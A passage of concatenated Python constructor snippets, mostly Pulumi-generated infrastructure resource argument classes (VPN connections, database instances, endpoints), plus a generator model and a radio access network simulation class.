pulumi.Input[str],\n annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n checksum: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n external_id: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n ui_url: Optional[pulumi.Input[str]] = None,\n whitelist_domains: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"active\", active)\n pulumi.set(__self__, \"builtin\", builtin)\n pulumi.set(__self__, \"url\", url)\n if annotations is not None:\n pulumi.set(__self__, \"annotations\", annotations)\n if checksum is not None:\n pulumi.set(__self__, \"checksum\", checksum)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if external_id is not None:\n pulumi.set(__self__, \"external_id\", external_id)\n if labels is not None:\n pulumi.set(__self__, \"labels\", labels)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if ui_url is not None:\n pulumi.set(__self__, \"ui_url\", ui_url)\n if whitelist_domains is not None:\n pulumi.set(__self__, \"whitelist_domains\", whitelist_domains)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n endpoint_type: Optional[pulumi.Input[str]] = None,\n entry: Optional[pulumi.Input[str]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n module_name: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n minimum_engine_version: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n name_prefix: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n user_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if minimum_engine_version is not None:\n pulumi.set(__self__, \"minimum_engine_version\", minimum_engine_version)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if name_prefix is not None:\n pulumi.set(__self__, \"name_prefix\", name_prefix)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if user_names is not None:\n pulumi.set(__self__, \"user_names\", user_names)", "def __init__(__self__,\n resource_name: str,\n args: Optional[InstanceArgs] = None,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__, *,\n app_name: Optional[pulumi.Input[str]] = None,\n bundle_id: Optional[pulumi.Input[str]] = None,\n encoded_icon: Optional[pulumi.Input[str]] = None,\n industry_id: Optional[pulumi.Input[str]] = None,\n package_name: Optional[pulumi.Input[str]] = None,\n product_id: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None):\n if app_name is not None:\n pulumi.set(__self__, \"app_name\", app_name)\n if bundle_id is not None:\n pulumi.set(__self__, \"bundle_id\", bundle_id)\n if encoded_icon is not None:\n pulumi.set(__self__, \"encoded_icon\", encoded_icon)\n if industry_id is not None:\n pulumi.set(__self__, \"industry_id\", industry_id)\n if package_name is not None:\n pulumi.set(__self__, \"package_name\", package_name)\n if product_id is not None:\n pulumi.set(__self__, \"product_id\", product_id)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def __init__(__self__, *,\n availability_zone: Optional[pulumi.Input[str]] = None,\n connection_string: Optional[pulumi.Input[str]] = None,\n create_sample_data: Optional[pulumi.Input[bool]] = None,\n db_instance_category: Optional[pulumi.Input[str]] = None,\n db_instance_class: Optional[pulumi.Input[str]] = None,\n db_instance_mode: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n encryption_key: Optional[pulumi.Input[str]] = None,\n encryption_type: Optional[pulumi.Input[str]] = None,\n engine: Optional[pulumi.Input[str]] = None,\n engine_version: Optional[pulumi.Input[str]] = None,\n instance_charge_type: Optional[pulumi.Input[str]] = None,\n instance_group_count: Optional[pulumi.Input[int]] = None,\n instance_network_type: Optional[pulumi.Input[str]] = None,\n instance_spec: Optional[pulumi.Input[str]] = None,\n ip_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceIpWhitelistArgs']]]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n master_node_num: Optional[pulumi.Input[int]] = None,\n payment_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[str]] = None,\n port: Optional[pulumi.Input[str]] = None,\n private_ip_address: Optional[pulumi.Input[str]] = None,\n resource_group_id: Optional[pulumi.Input[str]] = None,\n security_ip_lists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n seg_node_num: Optional[pulumi.Input[int]] = None,\n seg_storage_type: Optional[pulumi.Input[str]] = None,\n ssl_enabled: Optional[pulumi.Input[int]] = None,\n status: Optional[pulumi.Input[str]] = None,\n storage_size: Optional[pulumi.Input[int]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n used_time: Optional[pulumi.Input[str]] = None,\n vector_configuration_status: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None):\n if availability_zone is not None:\n warnings.warn(\"\"\"Field 'availability_zone' has been deprecated from version 1.187.0. Use 'zone_id' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"availability_zone is deprecated: Field 'availability_zone' has been deprecated from version 1.187.0. Use 'zone_id' instead.\"\"\")\n if availability_zone is not None:\n pulumi.set(__self__, \"availability_zone\", availability_zone)\n if connection_string is not None:\n pulumi.set(__self__, \"connection_string\", connection_string)\n if create_sample_data is not None:\n pulumi.set(__self__, \"create_sample_data\", create_sample_data)\n if db_instance_category is not None:\n pulumi.set(__self__, \"db_instance_category\", db_instance_category)\n if db_instance_class is not None:\n pulumi.set(__self__, \"db_instance_class\", db_instance_class)\n if db_instance_mode is not None:\n pulumi.set(__self__, \"db_instance_mode\", db_instance_mode)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if encryption_key is not None:\n pulumi.set(__self__, \"encryption_key\", encryption_key)\n if encryption_type is not None:\n pulumi.set(__self__, \"encryption_type\", encryption_type)\n if engine is not None:\n pulumi.set(__self__, \"engine\", engine)\n if engine_version is not None:\n pulumi.set(__self__, \"engine_version\", engine_version)\n if instance_charge_type is not None:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n if instance_charge_type is not None:\n pulumi.set(__self__, \"instance_charge_type\", instance_charge_type)\n if instance_group_count is not None:\n pulumi.set(__self__, \"instance_group_count\", instance_group_count)\n if instance_network_type is not None:\n pulumi.set(__self__, \"instance_network_type\", instance_network_type)\n if instance_spec is not None:\n pulumi.set(__self__, \"instance_spec\", instance_spec)\n if ip_whitelists is not None:\n pulumi.set(__self__, \"ip_whitelists\", ip_whitelists)\n if maintain_end_time is not None:\n pulumi.set(__self__, \"maintain_end_time\", maintain_end_time)\n if maintain_start_time is not None:\n pulumi.set(__self__, \"maintain_start_time\", maintain_start_time)\n if master_node_num is not None:\n pulumi.set(__self__, \"master_node_num\", master_node_num)\n if payment_type is not None:\n pulumi.set(__self__, \"payment_type\", payment_type)\n if period is not None:\n pulumi.set(__self__, \"period\", period)\n if port is not None:\n pulumi.set(__self__, \"port\", port)\n if private_ip_address is not None:\n pulumi.set(__self__, \"private_ip_address\", private_ip_address)\n if resource_group_id is not None:\n pulumi.set(__self__, \"resource_group_id\", resource_group_id)\n if security_ip_lists is not None:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n if security_ip_lists is not None:\n pulumi.set(__self__, \"security_ip_lists\", security_ip_lists)\n if seg_node_num is not None:\n pulumi.set(__self__, \"seg_node_num\", seg_node_num)\n if seg_storage_type is not None:\n pulumi.set(__self__, \"seg_storage_type\", seg_storage_type)\n if ssl_enabled is not None:\n pulumi.set(__self__, \"ssl_enabled\", ssl_enabled)\n if status is not None:\n pulumi.set(__self__, \"status\", status)\n if storage_size is not None:\n pulumi.set(__self__, \"storage_size\", storage_size)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if used_time is not None:\n pulumi.set(__self__, \"used_time\", used_time)\n if vector_configuration_status is not None:\n pulumi.set(__self__, \"vector_configuration_status\", vector_configuration_status)\n if vpc_id is not None:\n pulumi.set(__self__, \"vpc_id\", vpc_id)\n if vswitch_id is not None:\n pulumi.set(__self__, \"vswitch_id\", vswitch_id)\n if zone_id is not None:\n pulumi.set(__self__, \"zone_id\", zone_id)", "def __init__(self, name, params):\n # create generic technology object\n DER.__init__(self, params['name'], 'ICE', params)\n # input params UNITS ARE COMMENTED TO THE RIGHT\n self.rated_power = params['rated_power'] # kW/generator\n self.p_min = params['min_power'] # kW/generator\n self.startup_time = params['startup_time'] # default value of 0, in units of minutes\n self.efficiency = params['efficiency'] # gal/kWh\n self.fuel_cost = params['fuel_cost'] # $/gal\n self.vari_om = params['variable_om_cost'] # $/kwh\n self.fixed_om = params['fixed_om_cost'] # $/yr\n self.capital_cost = params['ccost'] # $/generator\n self.ccost_kw = params['ccost_kW']\n\n self.variable_names = {'ice_gen', 'on_ice'}\n try:\n self.n = params['n'] # generators\n self.capex = self.capital_cost * self.n + self.ccost_kw * self.rated_power * self.n\n except KeyError:\n pass", "def __init__(self, name: str, ap_id: str, rac_config: RadioAccessNetworkConfiguration):\n super().__init__(name=name)\n\n self.simple = rac_config.bypass_amf # Simple A&C bypasses AMF\n\n # inputs/outputs to UEs\n self.input_access_request = Port(AccessRequest, 'input_access_request')\n self.input_disconnect_request = Port(DisconnectRequest, 'input_disconnect_request')\n self.input_rrc = Port(RadioResourceControl, 'input_rrc')\n self.input_ho_ready = Port(HandOverReady, 'input_ho_ready')\n self.input_ho_response = Port(HandOverResponse, 'input_ho_response')\n self.output_access_response = Port(AccessResponse, 'output_access_response')\n self.output_disconnect_response = Port(DisconnectResponse, 'output_disconnect_response')\n self.output_ho_started = Port(HandOverStarted, 'output_ho_started')\n self.output_ho_finished = Port(HandOverFinished, 'output_ho_finished')\n self.add_in_port(self.input_access_request)\n self.add_in_port(self.input_disconnect_request)\n self.add_in_port(self.input_rrc)\n self.add_in_port(self.input_ho_ready)\n self.add_in_port(self.input_ho_response)\n self.add_out_port(self.output_access_response)\n self.add_out_port(self.output_disconnect_response)\n self.add_out_port(self.output_ho_started)\n self.add_out_port(self.output_ho_finished)\n\n # inputs/outputs to APs\n self.input_start_ho_request = Port(StartHandOverRequest, 'input_start_ho_request')\n self.input_start_ho_response = Port(StartHandOverResponse, 'input_start_ho_response')\n self.output_start_ho_request = Port(StartHandOverRequest, 'output_start_ho_request')\n self.output_start_ho_response = Port(StartHandOverResponse, 'output_start_ho_response')\n self.add_in_port(self.input_start_ho_request)\n self.add_in_port(self.input_start_ho_response)\n self.add_out_port(self.output_start_ho_request)\n self.add_out_port(self.output_start_ho_response)\n\n # inputs/outputs for core network\n if not self.simple:\n self.output_create_path_request = Port(CreatePathRequest, 'output_create_path_request')\n self.output_remove_path_request = Port(RemovePathRequest, 'output_remove_path_request')\n self.output_switch_path_request = Port(SwitchPathRequest, 'output_switch_path_request')\n self.input_create_path_response = Port(CreatePathResponse, 'input_create_path_response')\n self.input_remove_path_response = Port(RemovePathResponse, 'input_remove_path_response')\n self.input_switch_path_response = Port(SwitchPathResponse, 'input_switch_path_response')\n self.add_out_port(self.output_create_path_request)\n self.add_out_port(self.output_remove_path_request)\n self.add_out_port(self.output_switch_path_request)\n self.add_in_port(self.input_create_path_response)\n self.add_in_port(self.input_remove_path_response)\n self.add_in_port(self.input_switch_path_response)\n\n # AP internal inputs/outputs\n self.output_connected_ue_list = Port(EnableChannels, 'output_connected_ue_list')\n self.add_out_port(self.output_connected_ue_list)\n\n self.ap_id = ap_id # AP ID\n self.header = rac_config.header # Header for application packets\n self.ue_path = dict() # dictionary {UE ID: UE status}\n self.ue_to_ho_to = dict() # dictionary of connected_ap UE to be handed over {node_id: new_ap_id}\n self.ue_to_ho_from = dict() # dictionary of UE to be connected_ap via hand over {node_id: prev_ap_id}", "def __init__(self, name, direction, core):\n self.name = name\n self.direction = direction\n self.signals = {}\n self.core = core\n self.endpoints = []\n self.interface_type = None", "def __init__(__self__, *,\n distribution_type: pulumi.Input[str],\n instance_id: pulumi.Input[str],\n connection_prefix: Optional[pulumi.Input[str]] = None,\n max_delay_time: Optional[pulumi.Input[int]] = None,\n port: Optional[pulumi.Input[int]] = None,\n weight: Optional[pulumi.Input[Mapping[str, Any]]] = None):\n pulumi.set(__self__, \"distribution_type\", distribution_type)\n pulumi.set(__self__, \"instance_id\", instance_id)\n if connection_prefix is not None:\n pulumi.set(__self__, \"connection_prefix\", connection_prefix)\n if max_delay_time is not None:\n pulumi.set(__self__, \"max_delay_time\", max_delay_time)\n if port is not None:\n pulumi.set(__self__, \"port\", port)\n if weight is not None:\n pulumi.set(__self__, \"weight\", weight)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n interception_port: Optional[pulumi.Input[int]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n location: Optional[pulumi.Input[str]] = None,\n mesh_id: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n core_network_arn: Optional[pulumi.Input[str]] = None,\n core_network_attachment_arn: Optional[pulumi.Input[str]] = None,\n customer_gateway_configuration: Optional[pulumi.Input[str]] = None,\n customer_gateway_id: Optional[pulumi.Input[str]] = None,\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n routes: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionRouteArgs']]]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_address: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel1_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel1_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_address: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel2_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n vgw_telemetries: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionVgwTelemetryArgs']]]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if core_network_arn is not None:\n pulumi.set(__self__, \"core_network_arn\", core_network_arn)\n if core_network_attachment_arn is not None:\n pulumi.set(__self__, \"core_network_attachment_arn\", core_network_attachment_arn)\n if customer_gateway_configuration is not None:\n pulumi.set(__self__, \"customer_gateway_configuration\", customer_gateway_configuration)\n if customer_gateway_id is not None:\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if routes is not None:\n pulumi.set(__self__, \"routes\", routes)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transit_gateway_attachment_id\", transit_gateway_attachment_id)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_address is not None:\n pulumi.set(__self__, \"tunnel1_address\", tunnel1_address)\n if tunnel1_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel1_bgp_asn\", tunnel1_bgp_asn)\n if tunnel1_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel1_bgp_holdtime\", tunnel1_bgp_holdtime)\n if tunnel1_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_cgw_inside_address\", tunnel1_cgw_inside_address)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, \"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel1_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_vgw_inside_address\", tunnel1_vgw_inside_address)\n if tunnel2_address is not None:\n pulumi.set(__self__, \"tunnel2_address\", tunnel2_address)\n if tunnel2_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel2_bgp_asn\", tunnel2_bgp_asn)\n if tunnel2_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel2_bgp_holdtime\", tunnel2_bgp_holdtime)\n if tunnel2_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_cgw_inside_address\", tunnel2_cgw_inside_address)\n if tunnel2_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, \"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel2_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_vgw_inside_address\", tunnel2_vgw_inside_address)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if vgw_telemetries is not None:\n pulumi.set(__self__, \"vgw_telemetries\", vgw_telemetries)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n instance_id: Optional[pulumi.Input[int]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n connection_prefix: Optional[pulumi.Input[str]] = None,\n connection_string: Optional[pulumi.Input[str]] = None,\n distribution_type: Optional[pulumi.Input[str]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n max_delay_time: Optional[pulumi.Input[int]] = None,\n port: Optional[pulumi.Input[int]] = None,\n weight: Optional[pulumi.Input[Mapping[str, Any]]] = None):\n if connection_prefix is not None:\n pulumi.set(__self__, \"connection_prefix\", connection_prefix)\n if connection_string is not None:\n pulumi.set(__self__, \"connection_string\", connection_string)\n if distribution_type is not None:\n pulumi.set(__self__, \"distribution_type\", distribution_type)\n if instance_id is not None:\n pulumi.set(__self__, \"instance_id\", instance_id)\n if max_delay_time is not None:\n pulumi.set(__self__, \"max_delay_time\", max_delay_time)\n if port is not None:\n 